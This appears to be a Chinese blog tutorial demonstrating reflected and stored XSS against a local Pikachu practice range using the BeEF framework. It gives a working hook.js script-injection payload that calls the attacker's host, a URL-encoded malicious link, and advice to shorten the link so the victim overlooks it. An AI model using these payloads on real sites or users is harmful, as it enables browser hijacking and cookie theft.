Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)

XSS漏洞的 概括:

XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.

目录

      XSS漏洞的 概括:

XSS漏洞的危害:

第一步:安装 Beef.

1.首先输入命令进行安装.

发现安装不了,但是有提示.

2.根据提示进行输入命令.

3.再输入命令进行安装.

4.直接运行 Beef-xss.

5.访问 http://(IP地址):3000/ui/panel

第二步:Beef工具利用.

1.启动 Beef 工具.

2.利用 生成的链接 写入存在有 XSS漏洞 的地方.

反射型的利用:

(1) 找到存在 XSS漏洞 的地方.

(2)把生成的新链接 复制 下来.(写入 XSS漏洞代码 的链接)

(3)隐藏链接 (由于链接过长容易被发现.)

(4)把短链接发给靶机访问.(但靶机访问就会受到 XSS漏洞 的攻击.)

(5)在 kali 里访问 和 登录 Beef 工具.

存储型的利用:

(1) 找到存在 XSS漏洞 的地方.

(2)用 靶机 去访问这个留言板.(当靶机访问留言页面的时候,就已经遭到到我们 XSS漏洞 的攻击了.)

(3)在 kali 里访问 和 登录 Beef 工具.


免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。


XSS漏洞的危害:

(1)窃取用户Cookie,如果用户Cookie被窃取,攻击者可以不通过密码,而直接登录用户账户.
(2)使用XMLHttpRequest构造模拟用户请求操作.
(3)XSS钓鱼攻击.
(4)用户PC信息探测收集器.
(5)XSS蠕虫攻击等.


测试机:

kali    链接:https://pan.baidu.com/s/1ZKvP-CFYcmhFw3ol5ul4bg 
          提取码:tian 


靶机:

win 10(IP地址:192.168.1.102


靶场:

本地自己搭建的 Pikachu(皮卡丘)靶场:安装在win XP(IP地址:192.168.1.104

Pikachu(皮卡丘)靶场搭建链接:Web安全 Pikachu(皮卡丘)靶场搭建._半个西瓜.的博客-CSDN博客


第一步:安装 Beef.

1.首先输入命令进行安装.

apt-get install beef-xss

发现安装不了,但是有提示.


2.根据提示进行输入命令.

apt-get update


3.再输入命令进行安装.

apt-get install beef-xss


4.直接运行 Beef-xss.

beef-xss

标记处的意思是叫你 修改密码(密码输入时不可见.),本身默认的密码和账号分别为 beef 和 beef


5.访问 http://(IP地址):3000/ui/panel

http://127.0.0.1:3000/ui/panel

账号:beef        密码:是你在上面输入的密码(这里我输入的是:root)

成功进入的页面.


第二步:Beef工具利用.

1.启动 Beef 工具.

beef-xss


2.利用 生成的链接 写入存在有 XSS漏洞 的地方.

 命令概括:<script src="http://(自己本地的IP地址):3000/hook.js"></script>

<script src="http://192.168.1.105:3000/hook.js"></script>

反射型的利用:

(1) 找到存在 XSS漏洞 的地方.

写入的命令:

<script src="http://192.168.1.105:3000/hook.js"></script>


(2)把生成的新链接 复制 下来.(写入 XSS漏洞代码 的链接)

http://192.168.1.104:801/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript+src%3D%22http%3A%2F%2F192.168.1.105%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&submit=submit


(3)隐藏链接 (由于链接过长容易被发现.

利用工具生成为短链接:45短网址


(4)把短链接发给靶机访问.(但靶机访问就会受到 XSS漏洞 的攻击.

http://wlw3q.cn/bXjcN


(5)在 kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel


存储型的利用:

(1) 找到存在 XSS漏洞 的地方.

写入的命令:

<script src="http://192.168.1.105:3000/hook.js"></script>


(2)用 靶机 去访问这个留言板.(当靶机访问留言页面的时候,就已经遭到到我们 XSS漏洞 的攻击了.)

靶机访问网站的留言页面:


(3)kali 里访问 和 登录 Beef 工具.

http://127.0.0.1:3000/ui/panel

   


参考链接:kali安装beef - phyger - 博客园

参考链接:XSS漏洞原理和利用_VictorZhang-CSDN博客_xss漏洞原理

  • 34
    点赞
  • 61
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值